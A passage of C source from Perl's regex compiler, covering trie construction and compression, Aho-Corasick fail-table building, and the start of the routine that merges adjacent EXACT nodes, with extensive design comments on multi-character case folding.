2. 0 3 3. 0 5
3. 0 0 5. 0 0
4. 0 0 7. 0 0
The table is internally in the right hand, idx form. However as we
also have to deal with the states array which is indexed by nodenum
we have to use TRIE_NODENUM() to convert.
*/
DEBUG_TRIE_COMPILE_MORE_r( Perl_re_indentf( aTHX_ "Compiling trie using table compiler\n",
depth+1));
trie->trans = (reg_trie_trans *)
PerlMemShared_calloc( ( TRIE_CHARCOUNT(trie) + 1 )
* trie->uniquecharcount + 1,
sizeof(reg_trie_trans) );
trie->states = (reg_trie_state *)
PerlMemShared_calloc( TRIE_CHARCOUNT(trie) + 2,
sizeof(reg_trie_state) );
next_alloc = trie->uniquecharcount + 1;
for ( cur = first ; cur < last ; cur = regnext( cur ) ) {
regnode *noper = NEXTOPER( cur );
U32 state = 1; /* required init */
U16 charid = 0; /* sanity init */
U32 accept_state = 0; /* sanity init */
U32 wordlen = 0; /* required init */
if (OP(noper) == NOTHING) {
regnode *noper_next= regnext(noper);
if (noper_next < tail)
noper= noper_next;
/* we will undo this assignment if noper does not
* point at a trieable type in the else clause of
* the following statement. */
}
if ( noper < tail
&& ( OP(noper) == flags
|| (flags == EXACT && OP(noper) == EXACT_ONLY8)
|| (flags == EXACTFU && ( OP(noper) == EXACTFU_ONLY8
|| OP(noper) == EXACTFUP))))
{
const U8 *uc= (U8*)STRING(noper);
const U8 *e= uc + STR_LEN(noper);
for ( ; uc < e ; uc += len ) {
TRIE_READ_CHAR;
if ( uvc < 256 ) {
charid = trie->charmap[ uvc ];
} else {
SV* const * const svpp = hv_fetch( widecharmap,
(char*)&uvc,
sizeof( UV ),
0);
charid = svpp ? (U16)SvIV(*svpp) : 0;
}
if ( charid ) {
charid--;
if ( !trie->trans[ state + charid ].next ) {
trie->trans[ state + charid ].next = next_alloc;
trie->trans[ state ].check++;
prev_states[TRIE_NODENUM(next_alloc)]
= TRIE_NODENUM(state);
next_alloc += trie->uniquecharcount;
}
state = trie->trans[ state + charid ].next;
} else {
Perl_croak( aTHX_ "panic! In trie construction, no char mapping for %" IVdf, uvc );
}
/* charid is now 0 if we dont know the char read, or
* nonzero if we do */
}
} else {
/* If we end up here it is because we skipped past a NOTHING, but did not end up
* on a trieable type. So we need to reset noper back to point at the first regop
* in the branch before we call TRIE_HANDLE_WORD().
*/
noper= NEXTOPER(cur);
}
accept_state = TRIE_NODENUM( state );
TRIE_HANDLE_WORD(accept_state);
} /* end second pass */
/* and now dump it out before we compress it */
DEBUG_TRIE_COMPILE_MORE_r(dump_trie_interim_table(trie, widecharmap,
revcharmap,
next_alloc, depth+1));
{
/*
* Inplace compress the table.*
For sparse data sets the table constructed by the trie algorithm will
be mostly 0/FAIL transitions or to put it another way mostly empty.
(Note that leaf nodes will not contain any transitions.)
This algorithm compresses the tables by eliminating most such
transitions, at the cost of a modest bit of extra work during lookup:
- Each states[] entry contains a .base field which indicates the
index in the state[] array wheres its transition data is stored.
- If .base is 0 there are no valid transitions from that node.
- If .base is nonzero then charid is added to it to find an entry in
the trans array.
-If trans[states[state].base+charid].check!=state then the
transition is taken to be a 0/Fail transition. Thus if there are fail
transitions at the front of the node then the .base offset will point
somewhere inside the previous nodes data (or maybe even into a node
even earlier), but the .check field determines if the transition is
valid.
XXX - wrong maybe?
The following process inplace converts the table to the compressed
table: We first do not compress the root node 1,and mark all its
.check pointers as 1 and set its .base pointer as 1 as well. This
allows us to do a DFA construction from the compressed table later,
and ensures that any .base pointers we calculate later are greater
than 0.
- We set 'pos' to indicate the first entry of the second node.
- We then iterate over the columns of the node, finding the first and
last used entry at l and m. We then copy l..m into pos..(pos+m-l),
and set the .check pointers accordingly, and advance pos
appropriately and repreat for the next node. Note that when we copy
the next pointers we have to convert them from the original
NODEIDX form to NODENUM form as the former is not valid post
compression.
- If a node has no transitions used we mark its base as 0 and do not
advance the pos pointer.
- If a node only has one transition we use a second pointer into the
structure to fill in allocated fail transitions from other states.
This pointer is independent of the main pointer and scans forward
looking for null transitions that are allocated to a state. When it
finds one it writes the single transition into the "hole". If the
pointer doesnt find one the single transition is appended as normal.
- Once compressed we can Renew/realloc the structures to release the
excess space.
See "Table-Compression Methods" in sec 3.9 of the Red Dragon,
specifically Fig 3.47 and the associated pseudocode.
demq
*/
const U32 laststate = TRIE_NODENUM( next_alloc );
U32 state, charid;
U32 pos = 0, zp=0;
trie->statecount = laststate;
for ( state = 1 ; state < laststate ; state++ ) {
U8 flag = 0;
const U32 stateidx = TRIE_NODEIDX( state );
const U32 o_used = trie->trans[ stateidx ].check;
U32 used = trie->trans[ stateidx ].check;
trie->trans[ stateidx ].check = 0;
for ( charid = 0;
used && charid < trie->uniquecharcount;
charid++ )
{
if ( flag || trie->trans[ stateidx + charid ].next ) {
if ( trie->trans[ stateidx + charid ].next ) {
if (o_used == 1) {
for ( ; zp < pos ; zp++ ) {
if ( ! trie->trans[ zp ].next ) {
break;
}
}
trie->states[ state ].trans.base
= zp
+ trie->uniquecharcount
- charid ;
trie->trans[ zp ].next
= SAFE_TRIE_NODENUM( trie->trans[ stateidx
+ charid ].next );
trie->trans[ zp ].check = state;
if ( ++zp > pos ) pos = zp;
break;
}
used--;
}
if ( !flag ) {
flag = 1;
trie->states[ state ].trans.base
= pos + trie->uniquecharcount - charid ;
}
trie->trans[ pos ].next
= SAFE_TRIE_NODENUM(
trie->trans[ stateidx + charid ].next );
trie->trans[ pos ].check = state;
pos++;
}
}
}
trie->lasttrans = pos + 1;
trie->states = (reg_trie_state *)
PerlMemShared_realloc( trie->states, laststate
* sizeof(reg_trie_state) );
DEBUG_TRIE_COMPILE_MORE_r(
Perl_re_indentf( aTHX_ "Alloc: %d Orig: %" IVdf " elements, Final:%" IVdf ". Savings of %%%5.2f\n",
depth+1,
(int)( ( TRIE_CHARCOUNT(trie) + 1 ) * trie->uniquecharcount
+ 1 ),
(IV)next_alloc,
(IV)pos,
( ( next_alloc - pos ) * 100 ) / (double)next_alloc );
);
} /* end table compress */
}
DEBUG_TRIE_COMPILE_MORE_r(
Perl_re_indentf( aTHX_ "Statecount:%" UVxf " Lasttrans:%" UVxf "\n",
depth+1,
(UV)trie->statecount,
(UV)trie->lasttrans)
);
/* resize the trans array to remove unused space */
trie->trans = (reg_trie_trans *)
PerlMemShared_realloc( trie->trans, trie->lasttrans
* sizeof(reg_trie_trans) );
{ /* Modify the program and insert the new TRIE node */
U8 nodetype =(U8)(flags & 0xFF);
char *str=NULL;
#ifdef DEBUGGING
regnode *optimize = NULL;
#ifdef RE_TRACK_PATTERN_OFFSETS
U32 mjd_offset = 0;
U32 mjd_nodelen = 0;
#endif /* RE_TRACK_PATTERN_OFFSETS */
#endif /* DEBUGGING */
/*
This means we convert either the first branch or the first Exact,
depending on whether the thing following (in 'last') is a branch
or not and whther first is the startbranch (ie is it a sub part of
the alternation or is it the whole thing.)
Assuming its a sub part we convert the EXACT otherwise we convert
the whole branch sequence, including the first.
*/
/* Find the node we are going to overwrite */
if ( first != startbranch || OP( last ) == BRANCH ) {
/* branch sub-chain */
NEXT_OFF( first ) = (U16)(last - first);
#ifdef RE_TRACK_PATTERN_OFFSETS
DEBUG_r({
mjd_offset= Node_Offset((convert));
mjd_nodelen= Node_Length((convert));
});
#endif
/* whole branch chain */
}
#ifdef RE_TRACK_PATTERN_OFFSETS
else {
DEBUG_r({
const regnode *nop = NEXTOPER( convert );
mjd_offset= Node_Offset((nop));
mjd_nodelen= Node_Length((nop));
});
}
DEBUG_OPTIMISE_r(
Perl_re_indentf( aTHX_ "MJD offset:%" UVuf " MJD length:%" UVuf "\n",
depth+1,
(UV)mjd_offset, (UV)mjd_nodelen)
);
#endif
/* But first we check to see if there is a common prefix we can
split out as an EXACT and put in front of the TRIE node. */
trie->startstate= 1;
if ( trie->bitmap && !widecharmap && !trie->jump ) {
/* we want to find the first state that has more than
* one transition, if that state is not the first state
* then we have a common prefix which we can remove.
*/
U32 state;
for ( state = 1 ; state < trie->statecount-1 ; state++ ) {
U32 ofs = 0;
I32 first_ofs = -1; /* keeps track of the ofs of the first
transition, -1 means none */
U32 count = 0;
const U32 base = trie->states[ state ].trans.base;
/* does this state terminate an alternation? */
if ( trie->states[state].wordnum )
count = 1;
for ( ofs = 0 ; ofs < trie->uniquecharcount ; ofs++ ) {
if ( ( base + ofs >= trie->uniquecharcount ) &&
( base + ofs - trie->uniquecharcount < trie->lasttrans ) &&
trie->trans[ base + ofs - trie->uniquecharcount ].check == state )
{
if ( ++count > 1 ) {
/* we have more than one transition */
SV **tmp;
U8 *ch;
/* if this is the first state there is no common prefix
* to extract, so we can exit */
if ( state == 1 ) break;
tmp = av_fetch( revcharmap, ofs, 0);
ch = (U8*)SvPV_nolen_const( *tmp );
/* if we are on count 2 then we need to initialize the
* bitmap, and store the previous char if there was one
* in it*/
if ( count == 2 ) {
/* clear the bitmap */
Zero(trie->bitmap, ANYOF_BITMAP_SIZE, char);
DEBUG_OPTIMISE_r(
Perl_re_indentf( aTHX_ "New Start State=%" UVuf " Class: [",
depth+1,
(UV)state));
if (first_ofs >= 0) {
SV ** const tmp = av_fetch( revcharmap, first_ofs, 0);
const U8 * const ch = (U8*)SvPV_nolen_const( *tmp );
TRIE_BITMAP_SET_FOLDED(trie,*ch, folder);
DEBUG_OPTIMISE_r(
Perl_re_printf( aTHX_ "%s", (char*)ch)
);
}
}
/* store the current firstchar in the bitmap */
TRIE_BITMAP_SET_FOLDED(trie,*ch, folder);
DEBUG_OPTIMISE_r(Perl_re_printf( aTHX_ "%s", ch));
}
first_ofs = ofs;
}
}
if ( count == 1 ) {
/* This state has only one transition, its transition is part
* of a common prefix - we need to concatenate the char it
* represents to what we have so far. */
SV **tmp = av_fetch( revcharmap, first_ofs, 0);
STRLEN len;
char *ch = SvPV( *tmp, len );
DEBUG_OPTIMISE_r({
SV *sv=sv_newmortal();
Perl_re_indentf( aTHX_ "Prefix State: %" UVuf " Ofs:%" UVuf " Char='%s'\n",
depth+1,
(UV)state, (UV)first_ofs,
pv_pretty(sv, SvPV_nolen_const(*tmp), SvCUR(*tmp), 6,
PL_colors[0], PL_colors[1],
(SvUTF8(*tmp) ? PERL_PV_ESCAPE_UNI : 0) |
PERL_PV_ESCAPE_FIRSTCHAR
)
);
});
if ( state==1 ) {
OP( convert ) = nodetype;
str=STRING(convert);
STR_LEN(convert)=0;
}
STR_LEN(convert) += len;
while (len--)
*str++ = *ch++;
} else {
#ifdef DEBUGGING
if (state>1)
DEBUG_OPTIMISE_r(Perl_re_printf( aTHX_ "]\n"));
#endif
break;
}
}
trie->prefixlen = (state-1);
if (str) {
regnode *n = convert+NODE_SZ_STR(convert);
NEXT_OFF(convert) = NODE_SZ_STR(convert);
trie->startstate = state;
trie->minlen -= (state - 1);
trie->maxlen -= (state - 1);
#ifdef DEBUGGING
/* At least the UNICOS C compiler choked on this
* being argument to DEBUG_r(), so let's just have
* it right here. */
if (
#ifdef PERL_EXT_RE_BUILD
1
#else
DEBUG_r_TEST
#endif
) {
regnode *fix = convert;
U32 word = trie->wordcount;
#ifdef RE_TRACK_PATTERN_OFFSETS
mjd_nodelen++;
#endif
Set_Node_Offset_Length(convert, mjd_offset, state - 1);
while( ++fix < n ) {
Set_Node_Offset_Length(fix, 0, 0);
}
while (word--) {
SV ** const tmp = av_fetch( trie_words, word, 0 );
if (tmp) {
if ( STR_LEN(convert) <= SvCUR(*tmp) )
sv_chop(*tmp, SvPV_nolen(*tmp) + STR_LEN(convert));
else
sv_chop(*tmp, SvPV_nolen(*tmp) + SvCUR(*tmp));
}
}
}
#endif
if (trie->maxlen) {
convert = n;
} else {
NEXT_OFF(convert) = (U16)(tail - convert);
DEBUG_r(optimize= n);
}
}
}
if (!jumper)
jumper = last;
if ( trie->maxlen ) {
NEXT_OFF( convert ) = (U16)(tail - convert);
ARG_SET( convert, data_slot );
/* Store the offset to the first unabsorbed branch in
jump[0], which is otherwise unused by the jump logic.
We use this when dumping a trie and during optimisation. */
if (trie->jump)
trie->jump[0] = (U16)(nextbranch - convert);
/* If the start state is not accepting (meaning there is no empty string/NOTHING)
* and there is a bitmap
* and the first "jump target" node we found leaves enough room
* then convert the TRIE node into a TRIEC node, with the bitmap
* embedded inline in the opcode - this is hypothetically faster.
*/
if ( !trie->states[trie->startstate].wordnum
&& trie->bitmap
&& ( (char *)jumper - (char *)convert) >= (int)sizeof(struct regnode_charclass) )
{
OP( convert ) = TRIEC;
Copy(trie->bitmap, ((struct regnode_charclass *)convert)->bitmap, ANYOF_BITMAP_SIZE, char);
PerlMemShared_free(trie->bitmap);
trie->bitmap= NULL;
} else
OP( convert ) = TRIE;
/* store the type in the flags */
convert->flags = nodetype;
DEBUG_r({
optimize = convert
+ NODE_STEP_REGNODE
+ regarglen[ OP( convert ) ];
});
/* XXX We really should free up the resource in trie now,
as we won't use them - (which resources?) dmq */
}
/* needed for dumping*/
DEBUG_r(if (optimize) {
regnode *opt = convert;
while ( ++opt < optimize) {
Set_Node_Offset_Length(opt, 0, 0);
}
/*
Try to clean up some of the debris left after the
optimisation.
*/
while( optimize < jumper ) {
Track_Code( mjd_nodelen += Node_Length((optimize)); );
OP( optimize ) = OPTIMIZED;
Set_Node_Offset_Length(optimize, 0, 0);
optimize++;
}
Set_Node_Offset_Length(convert, mjd_offset, mjd_nodelen);
});
} /* end node insert */
/* Finish populating the prev field of the wordinfo array. Walk back
* from each accept state until we find another accept state, and if
* so, point the first word's .prev field at the second word. If the
* second already has a .prev field set, stop now. This will be the
* case either if we've already processed that word's accept state,
* or that state had multiple words, and the overspill words were
* already linked up earlier.
*/
{
U16 word;
U32 state;
U16 prev;
for (word=1; word <= trie->wordcount; word++) {
prev = 0;
if (trie->wordinfo[word].prev)
continue;
state = trie->wordinfo[word].accept;
while (state) {
state = prev_states[state];
if (!state)
break;
prev = trie->states[state].wordnum;
if (prev)
break;
}
trie->wordinfo[word].prev = prev;
}
Safefree(prev_states);
}
/* and now dump out the compressed format */
DEBUG_TRIE_COMPILE_r(dump_trie(trie, widecharmap, revcharmap, depth+1));
RExC_rxi->data->data[ data_slot + 1 ] = (void*)widecharmap;
#ifdef DEBUGGING
RExC_rxi->data->data[ data_slot + TRIE_WORDS_OFFSET ] = (void*)trie_words;
RExC_rxi->data->data[ data_slot + 3 ] = (void*)revcharmap;
#else
SvREFCNT_dec_NN(revcharmap);
#endif
return trie->jump
? MADE_JUMP_TRIE
: trie->startstate>1
? MADE_EXACT_TRIE
: MADE_TRIE;
}
STATIC regnode *
S_construct_ahocorasick_from_trie(pTHX_ RExC_state_t *pRExC_state, regnode *source, U32 depth)
{
/* The Trie is constructed and compressed now so we can build a fail array if
* it's needed
This is basically the Aho-Corasick algorithm. Its from exercise 3.31 and
3.32 in the
"Red Dragon" -- Compilers, principles, techniques, and tools. Aho, Sethi,
Ullman 1985/88
ISBN 0-201-10088-6
We find the fail state for each state in the trie, this state is the longest
proper suffix of the current state's 'word' that is also a proper prefix of
another word in our trie. State 1 represents the word '' and is thus the
default fail state. This allows the DFA not to have to restart after its
tried and failed a word at a given point, it simply continues as though it
had been matching the other word in the first place.
Consider
'abcdgu'=~/abcdefg|cdgu/
When we get to 'd' we are still matching the first word, we would encounter
'g' which would fail, which would bring us to the state representing 'd' in
the second word where we would try 'g' and succeed, proceeding to match
'cdgu'.
*/
/* add a fail transition */
const U32 trie_offset = ARG(source);
reg_trie_data *trie=(reg_trie_data *)RExC_rxi->data->data[trie_offset];
U32 *q;
const U32 ucharcount = trie->uniquecharcount;
const U32 numstates = trie->statecount;
const U32 ubound = trie->lasttrans + ucharcount;
U32 q_read = 0;
U32 q_write = 0;
U32 charid;
U32 base = trie->states[ 1 ].trans.base;
U32 *fail;
reg_ac_data *aho;
const U32 data_slot = add_data( pRExC_state, STR_WITH_LEN("T"));
regnode *stclass;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_CONSTRUCT_AHOCORASICK_FROM_TRIE;
PERL_UNUSED_CONTEXT;
#ifndef DEBUGGING
PERL_UNUSED_ARG(depth);
#endif
if ( OP(source) == TRIE ) {
struct regnode_1 *op = (struct regnode_1 *)
PerlMemShared_calloc(1, sizeof(struct regnode_1));
StructCopy(source, op, struct regnode_1);
stclass = (regnode *)op;
} else {
struct regnode_charclass *op = (struct regnode_charclass *)
PerlMemShared_calloc(1, sizeof(struct regnode_charclass));
StructCopy(source, op, struct regnode_charclass);
stclass = (regnode *)op;
}
OP(stclass)+=2; /* convert the TRIE type to its AHO-CORASICK equivalent */
ARG_SET( stclass, data_slot );
aho = (reg_ac_data *) PerlMemShared_calloc( 1, sizeof(reg_ac_data) );
RExC_rxi->data->data[ data_slot ] = (void*)aho;
aho->trie=trie_offset;
aho->states=(reg_trie_state *)PerlMemShared_malloc( numstates * sizeof(reg_trie_state) );
Copy( trie->states, aho->states, numstates, reg_trie_state );
Newx( q, numstates, U32);
aho->fail = (U32 *) PerlMemShared_calloc( numstates, sizeof(U32) );
aho->refcount = 1;
fail = aho->fail;
/* initialize fail[0..1] to be 1 so that we always have
a valid final fail state */
fail[ 0 ] = fail[ 1 ] = 1;
for ( charid = 0; charid < ucharcount ; charid++ ) {
const U32 newstate = TRIE_TRANS_STATE( 1, base, ucharcount, charid, 0 );
if ( newstate ) {
q[ q_write ] = newstate;
/* set to point at the root */
fail[ q[ q_write++ ] ]=1;
}
}
while ( q_read < q_write) {
const U32 cur = q[ q_read++ % numstates ];
base = trie->states[ cur ].trans.base;
for ( charid = 0 ; charid < ucharcount ; charid++ ) {
const U32 ch_state = TRIE_TRANS_STATE( cur, base, ucharcount, charid, 1 );
if (ch_state) {
U32 fail_state = cur;
U32 fail_base;
do {
fail_state = fail[ fail_state ];
fail_base = aho->states[ fail_state ].trans.base;
} while ( !TRIE_TRANS_STATE( fail_state, fail_base, ucharcount, charid, 1 ) );
fail_state = TRIE_TRANS_STATE( fail_state, fail_base, ucharcount, charid, 1 );
fail[ ch_state ] = fail_state;
if ( !aho->states[ ch_state ].wordnum && aho->states[ fail_state ].wordnum )
{
aho->states[ ch_state ].wordnum = aho->states[ fail_state ].wordnum;
}
q[ q_write++ % numstates] = ch_state;
}
}
}
/* restore fail[0..1] to 0 so that we "fall out" of the AC loop
when we fail in state 1, this allows us to use the
charclass scan to find a valid start char. This is based on the principle
that theres a good chance the string being searched contains lots of stuff
that cant be a start char.
*/
fail[ 0 ] = fail[ 1 ] = 0;
DEBUG_TRIE_COMPILE_r({
Perl_re_indentf( aTHX_ "Stclass Failtable (%" UVuf " states): 0",
depth, (UV)numstates
);
for( q_read=1; q_read<numstates; q_read++ ) {
Perl_re_printf( aTHX_ ", %" UVuf, (UV)fail[q_read]);
}
Perl_re_printf( aTHX_ "\n");
});
Safefree(q);
/*RExC_seen |= REG_TRIEDFA_SEEN;*/
return stclass;
}
/* The below joins as many adjacent EXACTish nodes as possible into a single
* one. The regop may be changed if the node(s) contain certain sequences that
* require special handling. The joining is only done if:
* 1) there is room in the current conglomerated node to entirely contain the
* next one.
* 2) they are compatible node types
*
* The adjacent nodes actually may be separated by NOTHING-kind nodes, and
* these get optimized out
*
* XXX khw thinks this should be enhanced to fill EXACT (at least) nodes as full
* as possible, even if that means splitting an existing node so that its first
* part is moved to the preceeding node. This would maximise the efficiency of
* memEQ during matching.
*
* If a node is to match under /i (folded), the number of characters it matches
* can be different than its character length if it contains a multi-character
* fold. *min_subtract is set to the total delta number of characters of the
* input nodes.
*
* And *unfolded_multi_char is set to indicate whether or not the node contains
* an unfolded multi-char fold. This happens when it won't be known until
* runtime whether the fold is valid or not; namely
* 1) for EXACTF nodes that contain LATIN SMALL LETTER SHARP S, as only if the
* target string being matched against turns out to be UTF-8 is that fold
* valid; or
* 2) for EXACTFL nodes whose folding rules depend on the locale in force at
* runtime.
* (Multi-char folds whose components are all above the Latin1 range are not
* run-time locale dependent, and have already been folded by the time this
* function is called.)
*
* This is as good a place as any to discuss the design of handling these
* multi-character fold sequences. It's been wrong in Perl for a very long
* time. There are three code points in Unicode whose multi-character folds
* were long ago discovered to mess things up. The previous designs for
* dealing with these involved assigning a special node for them. This
* approach doesn't always work, as evidenced by this example:
* "\xDFs" =~ /s\xDF/ui # Used to fail before these patches
* Both sides fold to "sss", but if the pattern is parsed to create a node that
* would match just the \xDF, it won't be able to handle the case where a
* successful match would have to cross the node's boundary. The new approach
* that hopefully generally solves the problem generates an EXACTFUP node
* that is "sss" in this case.
*
* It turns out that there are problems with all multi-character folds, and not
* just these three. Now the code is general, for all such cases. The
* approach taken is:
* 1) This routine examines each EXACTFish node that could contain multi-
* character folded sequences. Since a single character can fold into
* such a sequence, the minimum match length for this node is less than
* the number of characters in the node. This routine returns in
* *min_subtract how many characters to subtract from the the actual
* length of the string to get a real minimum match length; it is 0 if
* there are no multi-char foldeds. This delta is used by the caller to
* adjust the min length of the match, and the delta between min and max,
* so that the optimizer doesn't reject these possibilities based on size
* constraints.
*
* 2) For the sequence involving the LATIN SMALL LETTER SHARP S (U+00DF)
* under /u, we fold it to 'ss' in regatom(), and in this routine, after
* joining, we scan for occurrences of the sequence 'ss' in non-UTF-8
* EXACTFU nodes. The node type of such nodes is then changed to
* EXACTFUP, indicating it is problematic, and needs careful handling.
* (The procedures in step 1) above are sufficient to handle this case in
* UTF-8 encoded nodes.) The reason this is problematic is that this is
* the only case where there is a possible fold length change in non-UTF-8
* patterns. By reserving a special node type for problematic cases, the
* far more common regular EXACTFU nodes can be processed faster.
* regexec.c takes advantage of this.
*
* EXACTFUP has been created as a grab-bag for (hopefully uncommon)
* problematic cases. These all only occur when the pattern is not
* UTF-8. In addition to the 'ss' sequence where there is a possible fold
* length change, it handles the situation where the string cannot be
* entirely folded. The strings in an EXACTFish node are folded as much
* as possible during compilation in regcomp.c. This saves effort in
* regex matching. By using an EXACTFUP node when it is not possible to
* fully fold at compile time, regexec.c can know that everything in an
* EXACTFU node is folded, so folding can be skipped at runtime. The only
* case where folding in EXACTFU nodes can't be done at compile time is
* the presumably uncommon MICRO SIGN, when the pattern isn't UTF-8. This
* is because its fold requires UTF-8 to represent. Thus EXACTFUP nodes
* handle two very different cases. Alternatively, there could have been
* a node type where there are length changes, one for unfolded, and one
* for both. If yet another special case needed to be created, the number
* of required node types would have to go to 7. khw figures that even
* though there are plenty of node types to spare, that the maintenance
* cost wasn't worth the small speedup of doing it that way, especially
* since he thinks the MICRO SIGN is rarely encountered in practice.
*
* There are other cases where folding isn't done at compile time, but
* none of them are under /u, and hence not for EXACTFU nodes. The folds
* in EXACTFL nodes aren't known until runtime, and vary as the locale
* changes. Some folds in EXACTF depend on if the runtime target string
* is UTF-8 or not. (regatom() will create an EXACTFU node even under /di
* when no fold in it depends on the UTF-8ness of the target string.)
*
* 3) A problem remains for unfolded multi-char folds. (These occur when the
* validity of the fold won't be known until runtime, and so must remain
* unfolded for now. This happens for the sharp s in EXACTF and EXACTFAA
* nodes when the pattern isn't in UTF-8. (Note, BTW, that there cannot
* be an EXACTF node with a UTF-8 pattern.) They also occur for various
* folds in EXACTFL nodes, regardless of the UTF-ness of the pattern.)
* The reason this is a problem is that the optimizer part of regexec.c
* (probably unwittingly, in Perl_regexec_flags()) makes an assumption
* that a character in the pattern corresponds to at most a single
* character in the target string. (And I do mean character, and not byte
* here, unlike other parts of the documentation that have never been
* updated to account for multibyte Unicode.) Sharp s in EXACTF and
* EXACTFL nodes can match the two character string 'ss'; in EXACTFAA
* nodes it can match "\x{17F}\x{17F}". These, along with other ones in
* EXACTFL nodes, violate the assumption, and they are the only instances
* where it is violated. I'm reluctant to try to change the assumption,
* as the code involved is impenetrable to me (khw), so instead the code
* here punts. This routine examines EXACTFL nodes, and (when the pattern
* isn't UTF-8) EXACTF and EXACTFAA for such unfolded folds, and returns a
* boolean indicating whether or not the node contains such a fold. When
* it is true, the caller sets a flag that later causes the optimizer in
* this file to not set values for the floating and fixed string lengths,
* and thus avoids the optimizer code in regexec.c that makes the invalid
* assumption. Thus, there is no optimization based on string lengths for
* EXACTFL nodes that contain these few folds, nor for non-UTF8-pattern
* EXACTF and EXACTFAA nodes that contain the sharp s. (The reason the
* assumption is wrong only in these cases is that all other non-UTF-8
* folds are 1-1; and, for UTF-8 patterns, we pre-fold all other folds to
* their expanded versions. (Again, we can't prefold sharp s to 'ss' in
* EXACTF nodes because we don't know at compile time if it actually
* matches 'ss' or not. For EXACTF nodes it will match iff the target
* string is in UTF-8. This is in contrast to EXACTFU nodes, where it
* always matches; and EXACTFAA where it never does. In an EXACTFAA node
* in a UTF-8 pattern, sharp s is folded to "\x{17F}\x{17F}, avoiding the
* problem; but in a non-UTF8 pattern, folding it to that above-Latin1
* string would require the pattern to be forced into UTF-8, the overhead
* of which we want to avoid. Similarly the unfolded multi-char folds in
* EXACTFL nodes will match iff the locale at the time of match is a UTF-8
* locale.)
*
* Similarly, the code that generates tries doesn't currently handle
* not-already-folded multi-char folds, and it looks like a pain to change
* that. Therefore, trie generation of EXACTFAA nodes with the sharp s
* doesn't work. Instead, such an EXACTFAA is turned into a new regnode,
* EXACTFAA_NO_TRIE, which the trie code knows not to handle. Most people
* using /iaa matching will be doing so almost entirely with ASCII
* strings, so this should rarely be encountered in practice */
#define JOIN_EXACT(scan,min_subtract,unfolded_multi_char, flags) \
if (PL_regkind[OP(scan)] == EXACT) \
join_exact(pRExC_state,(scan),(min_subtract),unfolded_multi_char, (flags), NULL, depth+1)
STATIC U32
S_join_exact(pTHX_ RExC_state_t *pRExC_state, regnode *scan,
UV *min_subtract, bool *unfolded_multi_char,
U32 flags, regnode *val, U32 depth)
{
/* Merge several consecutive EXACTish nodes into one. */
regnode *n = regnext(scan);
U32 stringok = 1;
regnode *next = scan + NODE_SZ_STR(scan);
U32 merged = 0;
U32 stopnow = 0;
#ifdef DEBUGGING
regnode *stop = scan;
GET_RE_DEBUG_FLAGS_DECL;
#else
PERL_UNUSED_ARG(depth);
#endif
PERL_ARGS_ASSERT_JOIN_EXACT;
#ifndef EXPERIMENTAL_INPLACESCAN
PERL_UNUSED_ARG(flags);
PERL_UNUSED_ARG(val);
#endif
DEBUG_PEEP("join", scan, depth, 0);
assert(PL_regkind[OP(scan)] == EXACT);
/* Look through the subsequent nodes in the chain. Skip NOTHING, merge
* EXACT ones that are mergeable to the current one. */
while ( n
&& ( PL_regkind[OP(n)] == NOTHING
|| (stringok && PL_regkind[OP(n)] == EXACT))
&& NEXT_OFF(n)
&& NEXT_OFF(scan) + NEXT_OFF(n) < I16_MAX)
{
if (OP(n) == TAIL || n > next)
stringok = 0;
if (PL_regkind[OP(n)] == NOTHING) {
DEBUG_PEEP("skip:", n, depth, 0);
NEXT_OFF(scan) += NEXT_OFF(n);
next = n + NODE_STEP_REGNODE;
#ifdef DEBUGGING
if (stringok)
stop = n;
#endif
n = regnext(n);
}
else if (stringok) {
const unsigned int oldl = STR_LEN(scan);
regnode * const nnext = regnext(n);
/* XXX I (khw) kind of doubt that this works on platforms (should
* Perl ever run on one) where U8_MAX is above 255 because of lots
* of other assumptions */
/* Don't join if the sum can't fit into a single node */
if (oldl + STR_LEN(n) > U8_MAX)
break;
/* Joining something that requires UTF-8 with something that
* doesn't, means the result requires UTF-8. */
if (OP(scan) == EXACT && (OP(n) == EXACT_ONLY8)) {
OP(scan) = EXACT_ONLY8;
}
else if (OP(scan) == EXACT_ONLY8 && (OP(n) == EXACT)) {
; /* join is compatible, no need to change OP */
}
else if ((OP(scan) == EXACTFU) && (OP(n) == EXACTFU_ONLY8)) {
OP(scan) = EXACTFU_ONLY8;
}
else if ((OP(scan) == EXACTFU_ONLY8) && (OP(n) == EXACTFU)) {
; /* join is compatible, no need to change OP */
}
else if (OP(scan) == EXACTFU && OP(n) == EXACTFU) {
; /* join is compatible, no need to change OP */
}
else if (OP(scan) == EXACTFU && OP(n) == EXACTFU_S_EDGE) {
/* Under /di, temporary EXACTFU_S_EDGE nodes are generated,
* which can join with EXACTFU ones. We check for this case
* here. These need to be resolved to either EXACTFU or
* EXACTF at joining time. They have nothing in them that
* would forbid them from being the more desirable EXACTFU
* nodes except that they begin and/or end with a single [Ss].
* The reason this is problematic is because they could be
* joined in this loop with an adjacent node that ends and/or
* begins with [Ss] which would then form the sequence 'ss',
* which matches differently under /di than /ui, in which case
* EXACTFU can't be used. If the 'ss' sequence doesn't get
* formed, the nodes get absorbed into any adjacent EXACTFU
* node. And if the only adjacent node is EXACTF, they get
* absorbed into that, under the theory that a longer node is
* better than two shorter ones, even if one is EXACTFU. Note
* that EXACTFU_ONLY8 is generated only for UTF-8 patterns,
* and the EXACTFU_S_EDGE ones only for non-UTF-8. */
if (STRING(n)[STR_LEN(n)-1] == 's') {
/* Here the joined node would end with 's'. If the node
* following the combination is an EXACTF one, it's better to
* join this trailing edge 's' node with that one, leaving the
* current one in 'scan' be the more desirable EXACTFU */
if (OP(nnext) == EXACTF) {
break;
}
OP(scan) = EXACTFU_S_EDGE;
} /* Otherwise, the beginning 's' of the 2nd node just
becomes an interior 's' in 'scan' */
}
else if (OP(scan) == EXACTF && OP(n) == EXACTF) {
; /* join is compatible, no need to change OP */
}
else if (OP(scan) == EXACTF && OP(n) == EXACTFU_S_EDGE) {
/* EXACTF nodes are compatible for joining with EXACTFU_S_EDGE
* nodes. But the latter nodes can be also joined with EXACTFU
* ones, and that is a better outcome, so if the node following
* 'n' is EXACTFU, quit now so that those two can be joined
* later */
if (OP(nnext) == EXACTFU) {
break;
}
/* The join is compatible, and the combined node will be
* EXACTF. (These don't care if they begin or end with 's' */
}
else if (OP(scan) == EXACTFU_S_EDGE && OP(n) == EXACTFU_S_EDGE) {
if ( STRING(scan)[STR_LEN(scan)-1] == 's'
&& STRING(n)[0] == 's')
{
/* When combined, we have the sequence 'ss', which means we
* have to remain /di */
